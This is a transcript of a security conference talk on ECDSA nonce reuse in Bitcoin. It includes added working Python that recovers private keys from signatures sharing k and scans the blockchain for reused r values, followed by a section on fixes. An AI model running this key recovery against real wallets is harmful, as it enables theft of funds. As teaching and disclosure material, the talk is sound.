Exploiting ECDSA Failures in the Bitcoin Blockchain



Filippo Valsorda

October 15, 2014

Transcript

  1. Exploiting ECDSA Failures in the Bitcoin Blockchain. Filippo Valsorda, HITB2014KUL

  2. Filippo Valsorda, CloudFlare security team. @FiloSottile, filippo.io. I mess with cryptography. And open source.
  3. But you probably know me for this

  4. https://filippo.io/heartbleed

  5. Bitcoin

  6. A wallet: public key + private key. The address: hash(public key), e.g. 1DY5YvRxSwomrK7nELDZzAidQQ6ktjRR9A
  7. A transaction: a signed statement, published to the world and recorded in the blockchain. “This money I can spend, can now be spent by Y”
  8. A chain of such statements:
     A: “This money I can spend, can now be spent by X”
     …: “This money I can spend, can now be spent by …” (several hops)
     X: “This money I can spend, can now be spent by Y”
     …: “This money I can spend, can now be spent by …” (several hops)
     Y has this money to spend
  9. A: “This money I can spend, can now be spent by X”, signed with A’s private key; X is identified by the hash of X’s public key.
  10. Actually, for a standard pay-to-pubkey-hash output:
      scriptPubKey: OP_DUP OP_HASH160 <pubKeyHash> OP_EQUALVERIFY OP_CHECKSIG
      scriptSig:    <sig> <pubKey>

  12. ECDSA

  13. Elliptic Curve Digital Signature Algorithm: an EC-based signature scheme, as seen in TLS, DNSSEC, the PS3…
  14. A summary. Global: a point G on a curve. Private key: a random number d. Public key: d X G
  15. Signature: e = hash(message); k = a random number; (x, y) = k X G; r = x.
      Sig: [r, (e+r*d)/k]
  16. Seems fine, right? Unless… What happens if that k is not random?
  17. If you reuse k: k1 = k2, so (x, y) = k X G is the same point, r = x, and r1 = r2.
      Sig1: [r, (e1+r*d)/k]
      Sig2: [r, (e2+r*d)/k]

  18. Same slide, highlighting the shared r in both signatures.

  19. Same slide, highlighting the second components (e1+r*d)/k and (e2+r*d)/k.
  20. If you reuse k, write s1 = (e1+r*d)/k and s2 = (e2+r*d)/k. Then
      k = (e1 - e2) / (s1 - s2)
      d = (s1*k - e1) / r
      (all arithmetic mod the group order)
  21. Boom.
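
The derivation of slides 15 to 20 carried through in code, as an added example that is not the talk's own code: plain-Python secp256k1 arithmetic, two messages signed with one reused k, and the private key recovered with the slide 20 formulas. The key, the reused nonce and the two messages are made-up demo values.

```python
"""Added example (not the talk's code): ECDSA on secp256k1 with a reused k, and
private-key recovery from the two signatures, using the formulas of slides 15-20.
Pure Python, no dependencies. The key, the nonce and the messages are made up."""
import hashlib

# secp256k1 domain parameters (the curve Bitcoin uses)
P = 2**256 - 2**32 - 977
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

# Demo values, chosen arbitrarily for this example
D_PRIV = 0x1E99423A4ED27608A15A2616A2B0E9E52CED330AC530EDCC32C8FFC6A526AEDD
K_REUSED = 0x5A1B0F0CD8D5A58EF2F8D8C9C1B0E3A3A2F8E9D0C1B2A39485F6E7D8C9B0A1F2


def ec_add(p1, p2):
    """Affine point addition on y^2 = x^3 + 7; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                      # p1 == -p2
    if p1 == p2:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def ec_mul(k, point):
    """k X point by double-and-add (not constant time; fine for a demo)."""
    result, addend = None, point
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def hash_msg(message):
    """e = hash(message); Bitcoin hashes the transaction with double SHA-256."""
    inner = hashlib.sha256(message).digest()
    return int.from_bytes(hashlib.sha256(inner).digest(), "big")


def sign(d, e, k):
    """Sig: [r, (e + r*d)/k] with r = x of k X G, all mod N. k is a parameter
    precisely so that the caller can (wrongly) reuse it."""
    if not 1 <= k < N:
        raise ValueError("k out of range")
    x, _ = ec_mul(k, G)
    r = x % N
    s = (e + r * d) * pow(k, -1, N) % N
    return r, s


def verify(pub, e, sig):
    """Standard ECDSA check: x-coordinate of (e/s) X G + (r/s) X pub equals r."""
    r, s = sig
    if not (1 <= r < N and 1 <= s < N):
        return False
    w = pow(s, -1, N)
    point = ec_add(ec_mul(e * w % N, G), ec_mul(r * w % N, pub))
    return point is not None and point[0] % N == r


def recover_private_key(r, e1, s1, e2, s2):
    """Slide 20: with s1 = (e1 + r*d)/k and s2 = (e2 + r*d)/k sharing r (and so k),
    k = (e1 - e2)/(s1 - s2) and d = (s1*k - e1)/r, all mod N."""
    if (s1 - s2) % N == 0:
        raise ValueError("same s for both signatures: same message, nothing to recover")
    k = (e1 - e2) * pow(s1 - s2, -1, N) % N
    d = (s1 * k - e1) * pow(r, -1, N) % N
    return k, d


def demo():
    """Sign two different messages with one k, then recover both k and d."""
    pub = ec_mul(D_PRIV, G)
    e1 = hash_msg(b"This money I can spend, can now be spent by X")   # constructed
    e2 = hash_msg(b"This money I can spend, can now be spent by Y")   # constructed
    r1, s1 = sign(D_PRIV, e1, K_REUSED)
    r2, s2 = sign(D_PRIV, e2, K_REUSED)
    assert r1 == r2                                  # same k, same point, same r
    assert verify(pub, e1, (r1, s1)) and verify(pub, e2, (r2, s2))
    return recover_private_key(r1, e1, s1, e2, s2)   # == (K_REUSED, D_PRIV)


if __name__ == "__main__":
    k, d = demo()
    print("recovered k matches:", k == K_REUSED, "recovered d matches:", d == D_PRIV)
```

One caveat for real Bitcoin data: a signature may carry N - s instead of s (low-S normalisation), which flips the sign of one term, so a recovery tool tries both s2 and N - s2 and keeps the d whose public key matches the one in the scriptSig.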

  22. Screenshot: Imperialviolet (Adam Langley’s blog)
  23. Screenshot: Sony’s ECDSA code, Wednesday, 29 December 2010
  25. the blockchain

  26. Reminder: when money is moved, a signature is published. To spend money you reveal the public key of the address and a signature with that key.
  27. An easy search. An input is money being spent in the tx.
      for block in chain:
          for tx in block:
              for input in tx:
                  ...
  28. An easy search: extract r from the signature; take note of where we found it in a lookup table; check if we found it before.
  29. Done! If anyone reuses k, we will find two equal r.
  30. Done! Well… No. I mean, yes, but there are 100M inputs in the blockchain. Out of memory! :(
  31. A smarter search. First pass: filter the possible r: add each r to a Bloom filter; if it is already present, add it to a set. Second pass: if r is present in the set, export sig and pubkey.
  32. Diagram of the smarter search (continued on slides 33 and 34): each r read from the blockchain (42, 19, 36, 42…) is checked against the Bloom filter; an r already present (42, seen twice) goes into the set, and the second pass exports sig, pubkey, tx… for those r into the final list.
  35. Finally: group the list by (r, pubkey) and recover d from pairs of signatures!
  36. A ready-to-use tool: Blockchainr, github.com/filosottile/blockchainr
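
The two-pass search of slides 27 to 35, as an added example that is not the talk's blockchainr tool: a small Bloom filter for pass one, a candidate set, and a second pass that exports and groups by (r, pubkey). The chain it walks is constructed in the block (made-up txids and small integer r, s, e values); a real run would feed it parsed transaction inputs.

```python
"""Added example (not the talk's blockchainr tool): the two-pass search of slides
27-35. Pass one keeps only r values in a Bloom filter and records repeats in a set;
pass two exports full records for those r and groups them by (r, pubkey).
The blockchain below is constructed: made-up txids, small integer r/s/e values."""
import hashlib
from collections import defaultdict


class BloomFilter:
    """m-bit Bloom filter with `hashes` SHA-256-derived indexes. It can say "seen"
    for an r never added (false positive) but never "unseen" for one it has."""

    def __init__(self, m_bits=1 << 20, hashes=4):
        self.m = m_bits
        self.hashes = hashes
        self.bits = bytearray(m_bits // 8 + 1)

    def _indexes(self, item):
        data = str(item).encode()
        for i in range(self.hashes):
            digest = hashlib.sha256(bytes([i]) + data).digest()
            yield int.from_bytes(digest[:8], "big") % self.m

    def add(self, item):
        for idx in self._indexes(item):
            self.bits[idx >> 3] |= 1 << (idx & 7)

    def __contains__(self, item):
        return all(self.bits[idx >> 3] & (1 << (idx & 7)) for idx in self._indexes(item))


# Constructed chain: blocks, each holding transactions, each holding spent inputs
# with the (r, s) of the signature, the sighash e and the revealed pubkey.
SAMPLE_CHAIN = [
    {"tx": [
        {"txid": "a1", "inputs": [{"r": 42, "s": 7, "e": 1000, "pubkey": "PK_A"}]},
        {"txid": "b2", "inputs": [{"r": 19, "s": 5, "e": 1500, "pubkey": "PK_B"}]},
    ]},
    {"tx": [
        # same key, same r, different message: the exploitable case
        {"txid": "c3", "inputs": [{"r": 42, "s": 11, "e": 2000, "pubkey": "PK_A"}]},
        # same r under two different keys (the multisig oddity of slide 42)
        {"txid": "d4", "inputs": [{"r": 36, "s": 3, "e": 3000, "pubkey": "PK_C"},
                                  {"r": 36, "s": 9, "e": 3001, "pubkey": "PK_D"}]},
    ]},
    {"tx": [
        # the very same signature seen again: s1 - s2 = 0, nothing to recover
        {"txid": "e5", "inputs": [{"r": 19, "s": 5, "e": 1500, "pubkey": "PK_B"}]},
        {"txid": "f6", "inputs": [{"r": 77, "s": 2, "e": 4000, "pubkey": "PK_E"}]},
    ]},
]


def scan_inputs(chain):
    """for block in chain: for tx in block: for input in tx (slide 27)."""
    for block in chain:
        for tx in block["tx"]:
            for vin, inp in enumerate(tx["inputs"]):
                yield tx["txid"], vin, inp["r"], inp["s"], inp["e"], inp["pubkey"]


def find_reused_r(chain):
    # Pass 1: r values only, bounded memory. A repeat (or a Bloom false positive)
    # lands in the candidate set; the set stays small because repeats are rare.
    bloom = BloomFilter()
    candidates = set()
    for _, _, r, _, _, _ in scan_inputs(chain):
        if r in bloom:
            candidates.add(r)
        else:
            bloom.add(r)

    # Pass 2: export sig, pubkey and location for candidate r only (slide 31),
    # grouped by (r, pubkey) as on slide 35.
    groups = defaultdict(list)
    for txid, vin, r, s, e, pub in scan_inputs(chain):
        if r in candidates:
            groups[(r, pub)].append((txid, vin, s, e))

    # Keep only groups that yield a usable pair: same key, same r, two different
    # (s, e). Singletons (false positives, r shared across different keys) and
    # duplicate records drop out here.
    return {key: sigs for key, sigs in groups.items()
            if len({(s, e) for _, _, s, e in sigs}) >= 2}


if __name__ == "__main__":
    for (r, pub), sigs in find_reused_r(SAMPLE_CHAIN).items():
        print("r =", r, "pubkey =", pub, "signatures:", sigs)
```

Each group returned is exactly the input the slide 20 recovery needs: one r, one pubkey, and two or more (s, e) pairs.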

  37. Results

  38. If you want to follow from home: https://filippo.io/hitb

  39. Does this happen?

  40. Does this happen? Yes.

  41. Plot: vertical axis = address, color = r

  42. Weird: multisignature transactions

  43. 1KtjBE8yDxoqNTSyLG2re4qtKK19KpvVLT 1BkE8ttBRUKVNTj3Lx1EPsw7vVbhuLZhBt

  44. Plot: vertical axis = address, color = r

  45. “gomez” 1GozmcsMBC7bnMVUQLTKEw5vBxbSeG4erW / 1HKywxiL4JziqXrzLKhmB6a74ma6kxbSDj

  46. Repeated r in the same transaction

  47. https://bitcointalk.org/index.php?topic=271486 “Bad signatures leading to 55.82152538 BTC theft (so far)”

  48. https://bitcointalk.org/index.php?topic=277595 Blockchain.info security [FUNDS STOLEN]

  50. Nick Sullivan, “exploiting randomness” demo

  53. The fix

  54. What’s needed: k must be secret and unique. Not necessarily random.
  55. Generate k deterministically, as a function of the private key and the message. RFC 6979: k = HMAC_DRBG(d, H(m))
  56. Bitcoin Core: unsafe. OpenSSL patch by AGL waiting on master.

  58. Electrum: safe since v1.9 (correct use of python-ecdsa)

  59. Multibit / bitcoinj: safe (correct use of bouncycastle)

  60. Blockchain.info: unsafe (relies on the browser RNG, if any!)

  62. bitrated / bitcoinjs-lib: safe (hashes privkey, message and random)

  63. Armory: unsafe (? - 90%); crypto++ seems to use a random value
  64. Trezor: safe (implements RFC 6979)

  65. Q&A. @filosottile, filippo.io/hitb-slides